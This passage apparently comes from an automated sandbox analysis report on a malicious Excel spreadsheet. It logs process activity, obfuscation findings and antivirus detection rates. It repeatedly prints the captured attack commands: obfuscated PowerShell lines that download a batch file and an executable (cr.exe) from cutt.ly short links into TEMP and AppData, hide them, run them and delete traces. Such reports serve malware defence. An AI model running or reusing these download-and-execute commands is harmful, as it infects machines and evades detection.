      Source: C:\Windows\System32\cmd.exeConsole Write: ................................t.i.m.e.o.u.t...}..v....................|.......................................x............... ..... .........
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............). ......................................\Q........J.............D$.............X...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D................................D$......................\Q.....x................D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................i.f. ...........`{.J.....................\Q.....X%.J.............D$.............................................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................".6...1.". .=.=. .".6...1.". ............\Q.....i.f. ............D$.............X...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................C.m.d...........................................(................D$.............X...............x...............
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$......................................................................\Q.....C.m.d............D$...............$.....j.......................
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................). ..............D$......................\Q.......$..............D$.............X...............................
      Source: C:\Windows\System32\cmd.exeConsole Write: ...................J............T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d............. ...............B.......................
      Source: C:\Users\user\AppData\Roaming\cr.exeCommand line argument: nkF
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Roaming\cr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Roaming\cr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: ul9kpUwYel.xlsVirustotal: Detection: 41%
      Source: ul9kpUwYel.xlsMetadefender: Detection: 22%
      Source: ul9kpUwYel.xlsReversingLabs: Detection: 34%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: unknownProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
      Source: unknownProcess created: C:\Windows\System32\mode.com mode 18,1
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: unknownProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\cr.exe 'C:\Users\user\AppData\Roaming\cr.exe'
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 18,1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\cr.exe 'C:\Users\user\AppData\Roaming\cr.exe'
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2145478746.0000000002AA0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2164368901.0000000002A50000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2153405530.000000001B420000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2189543252.00000000028F0000.00000002.00000001.sdmp

      Data Obfuscation:

      barindex
      Obfuscated command line foundShow sources
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: unknownProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
      Suspicious powershell command line foundShow sources
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00423778 GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,
      Source: sqlite3.dll.24.drStatic PE information: section name: /4
      Source: sqlite3.dll.24.drStatic PE information: section name: /19
      Source: sqlite3.dll.24.drStatic PE information: section name: /31
      Source: sqlite3.dll.24.drStatic PE information: section name: /45
      Source: sqlite3.dll.24.drStatic PE information: section name: /57
      Source: sqlite3.dll.24.drStatic PE information: section name: /70
      Source: sqlite3.dll.24.drStatic PE information: section name: /81
      Source: sqlite3.dll.24.drStatic PE information: section name: /92
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00467460 push eax; ret
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004674C1 push eax; ret
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00467480 push eax; ret
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043FA71 push ecx; ret
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043FC66 push ecx; ret
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0046FED8 pushad ; retf 0046h
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00222AA1 push es; retf
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0022502A push esi; ret
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00223605 push 00000004h; iretd
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00223E89 push eax; retf
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002D76B0 push eax; ret
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002D76D0 push eax; ret
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002AFCC1 push ecx; ret
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_047F350A push ss; iretd
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_047F312B push ss; ret
      Source: initial sampleStatic PE information: section name: UPX0
      Source: initial sampleStatic PE information: section name: UPX1

      Persistence and Installation Behavior:

      barindex
      Tries to download and execute files (via powershell)Show sources
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\cr.exeJump to dropped file
      Source: C:\Users\user\AppData\Roaming\cr.exeFile created: C:\Users\user\AppData\LocalLow\sqlite3.dllJump to dropped file
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043ED22 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
